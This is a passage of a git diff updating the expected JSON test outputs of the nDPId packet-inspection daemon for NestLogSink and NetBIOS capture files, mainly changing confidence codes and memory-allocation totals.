00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":896,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718392405,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":896,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718392405,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":900,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":900,"packets-processed":713,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1536718512170} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":950,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":950,"packets-processed":743,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":117,"global_ts_msec":1536719113902} 00570{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":773,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":118,"global_ts_msec":1536719715232} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":774,"total-skipped-flows":0,"total-l4-payload-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":17,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":120,"global_ts_msec":1536719715232} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/774 @@ -126,9 +126,9 @@ ~~ total active/idle flows...: 17/17 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5933425 bytes -~~ total memory freed........: 5933425 bytes -~~ total allocations/frees...: 118964/118964 +~~ total memory allocated....: 6067059 bytes +~~ total memory freed........: 6067059 bytes +~~ total allocations/frees...: 121726/121726 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 805 chars diff --git a/test/results/netbios.pcap.out b/test/results/netbios.pcap.out index f45997a53..b67458300 100644 --- a/test/results/netbios.pcap.out +++ b/test/results/netbios.pcap.out @@ -2,72 +2,72 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1447772210350} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1447772210350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772210350,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvYAAIARuScKAASDCgAF\/wCJAIkAOr8ep0kBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1447772210821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772210821,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvkAAIARuSQKAASDCgAF\/wCJAIkAOr8dp0oBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1447772210835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772210835,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvoAAIARuSMKAASDCgAF\/wCJAIkAOr8fp0gBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1447772211392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772211392,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOKuIAAIAR79UKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772211392,"flow_last_seen":1447772211392,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772211392,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1447772212142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772212142,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOLrMAAIAR7AQKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1447772212892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772212892,"pkt":"\/\/\/\/\/\/\/\/AOCBt8asCABFAABOMrEAAIAR6AYKAAXpCgAF\/wCJAIkAOuD1mh4BEAABAAAAAAAAIEVQRktFSkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUJNAAAgAAE="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1447772214344,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1447772214344,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGUCABFAADlUKwAAIARylQKAAUJCgAF\/wCKAIoA0VBGEQ7C9AoABQkAigC7AAAgRU9GR0ZDREpDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATlZSOQAAAAAAAAAAAAAAAAYBBxABAA8BVaoA"} -00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"} 